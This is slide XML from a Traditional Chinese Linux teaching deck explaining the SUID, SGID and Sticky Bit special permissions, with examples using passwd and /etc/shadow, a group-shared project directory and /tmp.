              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>預設</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rwsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用者變更密碼的二進位執行檔，目的在於變更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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:----------)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>內</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的內容，但此檔案僅有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以讀取、編輯變更。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783080" y="1554480"/>
              <a:ext cx="1907640" cy="788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67240" y="1491120"/>
                <a:ext cx="193932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5192640" y="2122560"/>
              <a:ext cx="2318760" cy="594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176800" y="2059200"/>
                <a:ext cx="23504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814560" y="2116080"/>
              <a:ext cx="888480" cy="266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98360" y="2052720"/>
                <a:ext cx="92052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540240" y="2573280"/>
              <a:ext cx="4546080" cy="85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524040" y="2509920"/>
                <a:ext cx="457812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384560" y="3082680"/>
              <a:ext cx="80388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68720" y="3019320"/>
                <a:ext cx="8355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4644000" y="3082680"/>
              <a:ext cx="810000" cy="46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628160" y="3019320"/>
                <a:ext cx="84168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963400" y="3069720"/>
              <a:ext cx="934200" cy="331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947200" y="3006360"/>
                <a:ext cx="9662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335000" y="3108960"/>
              <a:ext cx="477000" cy="198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18800" y="3045600"/>
                <a:ext cx="50904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489320" y="3618360"/>
              <a:ext cx="209160" cy="68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473480" y="3555000"/>
                <a:ext cx="2408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860920" y="3598920"/>
              <a:ext cx="581400" cy="68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845080" y="3535200"/>
                <a:ext cx="613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397880" y="3559680"/>
              <a:ext cx="601200" cy="68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382040" y="3495960"/>
                <a:ext cx="6328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4141080" y="3638160"/>
              <a:ext cx="3448800" cy="68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125240" y="3574440"/>
                <a:ext cx="34804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684520" y="4114800"/>
              <a:ext cx="3063600" cy="655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668680" y="4051440"/>
                <a:ext cx="3095280" cy="19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3772080" y="2108160"/>
              <a:ext cx="425520" cy="129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755880" y="2044800"/>
                <a:ext cx="4575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450720" y="723960"/>
              <a:ext cx="1638720" cy="124488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34880" y="660240"/>
                <a:ext cx="1670400" cy="137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952560" y="723960"/>
              <a:ext cx="235080" cy="26712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36720" y="660240"/>
                <a:ext cx="267120" cy="39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9611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TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>呈上頁內容所有帳號的密碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>都記錄在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案內，檔案權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>『---------- 1 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，意思</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是僅有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可讀且強制寫入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般帳號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Stanley)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>需要修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>密碼，可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令修改密碼</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>甚麼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不能讓一般使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Stanley) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>去存取，但 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>stanley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>還</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>能夠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改密碼檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>內的密碼呢？ 這就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的功能啦！</a:t>
            </a:r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檔案目錄特殊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713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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>運作示意圖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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>V.S. cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令的差別</a:t>
            </a:r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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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/>
          <a:srcRect l="2253" t="4443" r="3139" b="36457"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="683567" y="2492896"/>
            <a:ext cx="7704857" cy="345638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筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3689280" y="2940120"/>
              <a:ext cx="680040" cy="129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673440" y="2876400"/>
                <a:ext cx="7117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3765600" y="3193920"/>
              <a:ext cx="7668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49760" y="3130560"/>
                <a:ext cx="1083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3435480" y="3479760"/>
              <a:ext cx="584280" cy="129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19640" y="3416400"/>
                <a:ext cx="6163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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6013440" y="3340080"/>
              <a:ext cx="483120" cy="320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997600" y="3276720"/>
                <a:ext cx="5148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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3727440" y="5010120"/>
              <a:ext cx="6372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711600" y="4946760"/>
                <a:ext cx="95760" cy="127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162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條</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>件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GID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限對執行檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與資料夾有效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執行者必須需要具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>該</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的權限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行者在執行的過程中將會獲得該程式群組的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>支援。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>運用舉例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>群組公用資料夾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目標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>建立一個群組公用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>專案資料夾 類似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>共享資料夾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資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>共享資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>內的檔案將可被所屬群組的所有成員進行讀、寫及執行的動作。</a:t>
            </a:r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6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757160" y="1600200"/>
              <a:ext cx="1580760" cy="1112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40960" y="1536840"/>
                <a:ext cx="1612800" cy="23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363840" y="2175120"/>
              <a:ext cx="3370320" cy="267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48000" y="2111400"/>
                <a:ext cx="3402000" cy="39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7406640" y="2181600"/>
              <a:ext cx="1202040" cy="982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390800" y="2117880"/>
                <a:ext cx="123372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1456560" y="2586600"/>
              <a:ext cx="1045440" cy="2628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40720" y="2522880"/>
                <a:ext cx="10771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404360" y="3076200"/>
              <a:ext cx="96696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88520" y="3012840"/>
                <a:ext cx="9986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168640" y="3108960"/>
              <a:ext cx="86904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52440" y="3045600"/>
                <a:ext cx="901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873240" y="3148200"/>
              <a:ext cx="57492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857400" y="3084480"/>
                <a:ext cx="6066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6505200" y="3089520"/>
              <a:ext cx="1404720" cy="198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489360" y="3025800"/>
                <a:ext cx="14364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697480" y="3566160"/>
              <a:ext cx="836280" cy="133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681640" y="3502800"/>
                <a:ext cx="86796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781800" y="3592440"/>
              <a:ext cx="1104120" cy="392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765960" y="3528720"/>
                <a:ext cx="113580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5590800" y="3618360"/>
              <a:ext cx="2691360" cy="1245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5574960" y="3555000"/>
                <a:ext cx="2723040" cy="25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450080" y="3958200"/>
              <a:ext cx="561960" cy="133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34240" y="3894480"/>
                <a:ext cx="5936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5886360" y="3587760"/>
              <a:ext cx="2235600" cy="7668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870520" y="3524400"/>
                <a:ext cx="226728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7321680" y="5950080"/>
              <a:ext cx="889200" cy="2556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305840" y="5886360"/>
                <a:ext cx="92088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7537320" y="5950080"/>
              <a:ext cx="673560" cy="648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521480" y="5886360"/>
                <a:ext cx="7052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1473120" y="6343560"/>
              <a:ext cx="1156320" cy="320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457280" y="6280200"/>
                <a:ext cx="1188000" cy="15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5827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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" b="1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作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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架構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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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1340768"/>
            <a:ext cx="7666821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3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目標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>建立多帳號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>支援同一群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與共用目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>srv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ahome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的建立！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一步建立專案帳號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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>第二步</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>專案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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0</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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/>
          <a:srcRect r="10730"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648" y="3212976"/>
            <a:ext cx="6336704" cy="136815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4"/>
          <a:srcRect r="15583"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187625" y="5341787"/>
            <a:ext cx="6624736" cy="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18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三步</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>專案資料夾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ahome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的所屬群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(project)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>及一般權限設定，並利用群組成員新增檔案，但發現檔案所屬群組與資料夾不同步。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檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目錄特殊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限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1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/>
          <a:srcRect l="-920" r="19057"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186012" y="3127038"/>
            <a:ext cx="7000951" cy="123806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4"/>
          <a:srcRect r="10747"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259631" y="4336126"/>
            <a:ext cx="6927331" cy="238960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筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1486080" y="3956040"/>
              <a:ext cx="152640" cy="194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469880" y="3892680"/>
                <a:ext cx="1846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筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1739880" y="3968640"/>
              <a:ext cx="120960" cy="133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24040" y="3905280"/>
                <a:ext cx="152640" cy="14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1650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 smtClean="0"/>
              <a:t>SGID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>範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四步設定特權模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(SGID)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>給專案資料夾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ahome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並確認資料夾所屬群組是否為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，並利用專案成員再開建立新檔案，結果發現檔案的所屬群組為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>符合預期效果。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檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目錄特殊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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/>
          <a:srcRect r="11049"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115615" y="4041774"/>
            <a:ext cx="7233095" cy="241156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筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1695600" y="4565520"/>
              <a:ext cx="101880" cy="133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79400" y="4502160"/>
                <a:ext cx="1339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筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2863800" y="5848200"/>
              <a:ext cx="375120" cy="324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47960" y="5784840"/>
                <a:ext cx="4068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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2952720" y="5950080"/>
              <a:ext cx="260640" cy="255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36880" y="5886360"/>
                <a:ext cx="292320" cy="153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3693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5"/>
            <a:ext cx="8229600" cy="5549900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sticky Bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>條件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目前只針對目錄有效，對於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案沒有效果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者對於目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>具有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>w(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>寫入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限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功能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使用者在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sticky Bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>下建立檔案或目錄時，僅有自己與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>才有權力刪除該檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>運用舉例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統預設</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>drwxrwxrwt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功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>任何人都可在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
